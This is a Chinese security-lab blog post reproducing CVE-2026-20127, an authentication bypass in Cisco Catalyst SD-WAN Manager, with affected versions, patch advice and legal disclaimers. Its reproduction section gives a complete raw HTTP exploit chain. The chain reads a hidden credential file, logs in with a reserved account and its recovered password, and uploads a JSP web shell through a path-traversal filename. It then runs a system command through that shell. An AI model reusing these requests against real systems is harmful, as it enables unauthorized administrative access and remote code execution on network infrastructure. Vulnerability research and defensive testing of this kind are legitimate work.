文章总结： 本文复现了CiscoCatalystSD-WAN身份验证绕过漏洞(CVE-2026-20127)，该漏洞因认证机制异常允许未授权攻击者获取管理权限。结合路径遍历漏洞，攻击者可上传恶意文件执行系统命令。文章提供了详细的攻击链复现步骤、受影响版本清单及Nuclei验证工具，建议尽快升级官方补丁或通过WAF部署防护规则进行临时缓解。 综合评分： 90 文章分类： 漏洞POC,漏洞分析,渗透测试,漏洞预警

【成功复现】Cisco Catalyst SD-WAN身份验证绕过漏洞(CVE-2026-20127)

原创

弥天安全实验室 弥天安全实验室

弥天安全实验室

2026年3月12日 22:09 陕西

网安引领时代，弥天点亮未来

0x00写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！

0x01漏洞介绍

Cisco Catalyst SD-WAN Manager（Cisco SD-WAN vManage）和Cisco Catalyst SD-WAN Controller都是美国思科（Cisco）公司的产品。Cisco Catalyst SD-WAN Manager是一个高度可定制的仪表板。可简化和自动化 Cisco SD-WAN 的部署、配置、管理和操作。Cisco Catalyst SD-WAN Controller是一个安全策略控制面板。

Cisco Catalyst SD-WAN Manager和Cisco Catalyst SD-WAN Controller存在授权问题漏洞，该漏洞源于对等身份验证机制工作异常，可能导致未经验证的攻击者绕过身份验证并获取管理权限。

0x02影响版本

Catalyst SD-WAN < 20.9

Catalyst SD-WAN 20.9 < 20.9.8.2

Catalyst SD-WAN 20.11 < 20.12.6.1

Catalyst SD-WAN 20.12.5 < 20.12.5.3

Catalyst SD-WAN 20.12.6 < 20.12.6.1

Catalyst SD-WAN 20.13 < 20.15.4.2

Catalyst SD-WAN 20.14 < 20.15.4.2

Catalyst SD-WAN 20.15 < 20.15.4.2

Catalyst SD-WAN 20.16 < 20.18.2.1

Catalyst SD-WAN 20.18 < 20.18.2.1

0x03漏洞复现

1.访问漏洞环境

2.漏洞复现

1、获取key

GET /reports/data/opt/data/containers/config/data-collection-agent/.dca HTTP/1.1Host: 127.0.0.1:8443User-Agent: Mozilla/5.0 (ZZ; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0Connection: closeAccept-Encoding: gzip, deflate

2、登录

POST /jts/authenticated/j_security_check HTTP/1.1Host: 127.0.0.1:8443User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0Connection: closeContent-Length: 75Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflate
j_username=viptela-reserved-dca&j_password=af744bd6250eee92e63e16eb4d802691

3、上传代码

POST /dataservice/smartLicensing/uploadAck HTTP/1.1Host: 127.0.0.1:8443User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Connection: closeContent-Length: 495Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXCookie: JSESSIONID=1RAwFU9DrlPVWmTIUy7Rzm-r0A-FKgBcOQG8Avtu.5b28bdb1-da60-43dc-a986-a06dd5c9f246; JSESSIONID=1RAwFU9DrlPVWmTIUy7Rzm-r0A-FKgBcOQG8Avtu.5b28bdb1-da60-43dc-a986-a06dd5c9f246Accept-Encoding: gzip, deflate
------WebKitFormBoundaryXContent-Disposition: form-data; name="file"; filename="../../../../../../../../../../../var/lib/wildfly/standalone/deployments/cmd.gz.war"Content-Type: application/java-archive
PK

4、成功执行id命令

POST /cmd.gz/cmd.jsp?cmd=id HTTP/1.1Host: 127.0.0.1:8443User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Mobile/15E148 Safari/604.1Connection: closeContent-Length: 6Content-Type: application/x-www-form-urlencodedCookie: JSESSIONID=1RAwFU9DrlPVWmTIUy7Rzm-r0A-FKgBcOQG8Avtu.5b28bdb1-da60-43dc-a986-a06dd5c9f246Accept-Encoding: gzip, deflate
cmd=id

3.nuclei工具测试【漏洞成功利用】

4.yakit工具测试

0x04修复建议

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

临时缓解方案

1、在 WAF、IDS/IPS 中部署基于 POC 的检测规则，识别针对该漏洞的探测与攻击行为。

  建议尽快升级修复漏洞，再次声明本文仅供学习使用，非法他用责任自负！

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-rpa-EHchtZk

弥天简介

学海浩茫，予以风动，必降弥天之润！弥天安全实验室成立于2019年2月19日，主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子，也是民间组织。主要以技术共享、交流等不断赋能自己，赋能安全圈，为网络安全发展贡献自己的微薄之力。

口号 网安引领时代，弥天点亮未来

知识分享完了

喜欢别忘了关注我们哦~

学海浩茫，

予以风动，

必降弥天之润！

弥  天

安全实验室

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：弥天安全实验室 弥天安全实验室 弥天安全实验室《【成功复现】Cisco Catalyst SD-WAN身份验证绕过漏洞(CVE-2026-20127)》